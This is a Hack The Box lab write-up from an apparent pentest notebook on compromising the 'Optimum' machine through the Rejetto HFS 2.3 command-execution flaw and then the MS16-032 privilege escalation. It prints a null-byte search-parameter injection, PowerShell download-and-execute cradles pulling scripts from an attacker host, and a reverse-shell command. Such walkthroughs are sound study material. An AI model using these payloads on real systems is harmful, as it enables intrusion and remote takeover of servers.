Hacking
  • Penetration Testing
  • Methodologies
    • Exfil
    • Manual Enumeration
    • Basic Buffer Overflow
    • Basic Internal Network test
    • Basic Mobile Testing guide
    • Basic Subdomain Enumeration guide
  • Guides
    • Build A Raspberry Pi Dropbox
    • Golang
    • Powershell / PowerView
    • PurpleSharp
  • Hack The Box last updated - 2019
    • Legacy
    • Devel
    • Optimum
    • Popcorn
    • Beep
    • Tenten
    • Arctic
    • Cronos
    • Grandpa
    • Granny
    • October
    • Lazy
    • Sneaky
    • Holiday
    • Blocky
    • Shrek
    • Blue
    • Joker
    • Europa
    • Haircut
    • Bank
    • SolidState
    • Mantis
    • Shocker
    • Tally
    • Sense
    • Jeeves
    • Stratosphere
    • Inception
    • Bashed
    • Fluxcapacitor
    • Canape
    • Rabbit
    • Chatterbox
    • Nibbles
    • Sunday
    • Aragog
    • Valentine
    • Silo
    • Olympus
    • Poison
    • Celestial
    • Waldo
    • Jerry
    • Access
    • Active
    • Netmon
  • scriptz
  • Issues
    • gists
    • Boring Issues
Powered by GitBook
On this page
  • Optimum - 10.10.10.8
  • Target Enumeration
  • Ports / Services / Software Versions Running
  • Vulnerability Exploited:
  • Vulnerability Explanation:
  • Privilege Escalation
  • Replicating the exploit:
  1. Hack The Box last updated - 2019

Optimum

PreviousDevelNextPopcorn

Last updated 6 years ago

Optimum - 10.10.10.8

Target Enumeration

IP: 10.10.10.9

User: d0c39409d7b994a9a1389ebf38ef5f73

Root: 51ed1b36553c8461f4552c2e92b3eeed

Ports / Services / Software Versions Running

80/tcp open http HttpFileServer httpd 2.3

Vulnerability Exploited:

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution

Vulnerability Explanation:

Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.

Privilege Escalation

MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation

Replicating the exploit:

Nmap

UDP

Port 80 in browser

Version number on page and in sourcecode:

Searchsploit

Copy to current dir

searchsploit -m windows/remote/39161.py

Modify the file with

Requires nc in current dir server over port 80 and start a listener on port 443

Execute the script

Now you have a low priv shell

Proof

That’s the easy way. There is also a metasploit module. Harder way, via the webapp.

Null bytes allow code execution

Send that to the repeater and ping your localhost

Use TCP dump to see if you can see the ping

Now download nishang

Copy powershell command to local folder (do not edit)

cp nishang/Shells/Invoke-PowerShellTcp.ps1 .

Add the following to the bottom of the file

Check you can ping with powershell

/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.2}

Check with tcpdump which should respond.

Replace ping with the following which needs to be URL encoded.:

After a while you will have a Powershell shell.

Run systeminfo and Sherlock.ps1 from within powershell

It appears its vulnerable to MS16-032

We do not have an interactive session so will need to download Empire to elevate our privileges

cp /root/Data/Lab/Hackthebox/HackTheBox/10.10.10.8/10.10.10.8/Empire/data/module_source/privesc/Invoke-MS16032.ps1

Modify with this line at the bottom

Copy existing powershell tcp script to shell.ps1

Amend the last line to the following and set up a nc listener on port 444

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 444

Execute the following as a low priv user:

Wait for a while and you will receive a system shell.

Evidence

git clone

/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('

IEX(New-Object Net.WebClient).DownloadString("")

git clone

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('')"

IEX(New-Object Net.WebClient).DownloadString("")

https://www.exploit-db.com/exploits/39161/
https://www.exploit-db.com/exploits/39719/
https://github.com/samratashok/nishang.git
http://10.10.14.2/Invoke-PowerShellTcp.ps1').}
http://10.10.14.2/Sherlock.ps1
https://github.com/EmpireProject/Empire.git
http://10.10.14.2/shell.ps1
http://10.10.14.2/Invoke-MS16032.ps1